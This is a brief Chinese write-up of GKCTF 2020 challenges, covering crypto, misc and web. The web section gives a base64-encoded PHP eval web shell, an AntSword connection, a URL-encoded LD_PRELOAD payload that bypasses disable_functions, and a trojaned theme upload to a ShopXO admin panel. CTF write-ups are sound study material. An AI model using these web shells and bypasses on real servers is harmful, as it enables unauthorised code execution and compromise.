[WP]GKCTF 2020

仿射密码解密

密文

base64加密得到flag

当铺密码解密

发现'FLAG'十进制ascii位69+1,74+2,62+3...
写脚本解密


RSA已知高位求低位
参考强网杯2019

基本一样的题目

略

gba模拟器,一路向北看到flag



二维码拼了很久也没扫出来

重绘了一下
扫一扫base(gkctf)
base58加密'gkctf'得到压缩包密码
解压得到混淆的js和图片


解密js得到

一个按字节替换的脚本
粗略地替换一下
#include <stdio.h>
int main(){
print("w3lc0me_4o_9kct5");
return
}得到C代码 括号里的就是flag

截取原始音乐的最后一段(DTMF音)

解密后对照九键键盘得到ctfiseun
eun感觉有点问题

audacity中发现解密密文中#2228333444777733(这里少了一个3)8866#
得到密钥ctfisfun

Free_File_camouflage解密得到flag

找到密码HelloWorld进去玩局打砖块得到flag


参考:https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
打开靶机,get传入一个 Ginkgo=ZXZhbCgkX1BPU1RbJ2EnXSk7 ,使用蚁剑连接新马,
向/tmp/文件夹传入一个bypass_disablefunc_x64.so ,把新代码使用url加密后使用POST传入,进去执行/readflag
Ginkgo=ZXZhbCgkX1BPU1RbJ2EnXSk7&cmd=/readflag&outpath=/tmp/xx&sopath=/tmp/bypass_disablefunc_x64.so
a=echo%20%22%3Cp%3E%20%3Cb%3Eexample%3C%2Fb%3E%3A%20http%3A%2F%2Fsite.com%2Fbypass_disablefunc.php%3Fcmd%3Dpwd%26outpath%3D%2Ftmp%2Fxx%26sopath%3D%2Fvar%2Fwww%2Fbypass_disablefunc_x64.so%20%3C%2Fp%3E%22%3B%0A%0A%20%20%20%20%24cmd%20%3D%20%24_GET%5B%22cmd%22%5D%3B%0A%20%20%20%20%24out_path%20%3D%20%24_GET%5B%22outpath%22%5D%3B%0A%20%20%20%20%24evil_cmdline%20%3D%20%24cmd%20.%20%22%20%3E%20%22%20.%20%24out_path%20.%20%22%202%3E%261%22%3B%0A%20%20%20%20echo%20%22%3Cp%3E%20%3Cb%3Ecmdline%3C%2Fb%3E%3A%20%22%20.%20%24evil_cmdline%20.%20%22%3C%2Fp%3E%22%3B%0A%0A%20%20%20%20putenv(%22EVIL_CMDLINE%3D%22%20.%20%24evil_cmdline)%3B%0A%0A%20%20%20%20%24so_path%20%3D%20%24_GET%5B%22sopath%22%5D%3B%0A%20%20%20%20putenv(%22LD_PRELOAD%3D%22%20.%20%24so_path)%3B%0A%0A%20%20%20%20mail(%22%22%2C%20%22%22%2C%20%22%22%2C%20%22%22)%3B%0A%0A%20%20%20%20echo%20%22%3Cp%3E%20%3Cb%3Eoutput%3C%2Fb%3E%3A%20%3Cbr%20%2F%3E%22%20.%20nl2br(file_get_contents(%24out_path))%20.%20%22%3C%2Fp%3E%22%3B%20%0A%0A%20%20%20%20



admin shopxo登录到控制台
去应用商店下载一个主题到本地,把马放到压缩包的


网站管理 主题管理 主题安装 上传本地修改过的主题

进入木马控制台

发现auto.sh,其运行了文件/var/mail/makeflaghint.py
查看这个文件

修改文件

返回查看flag.hint

得到flag
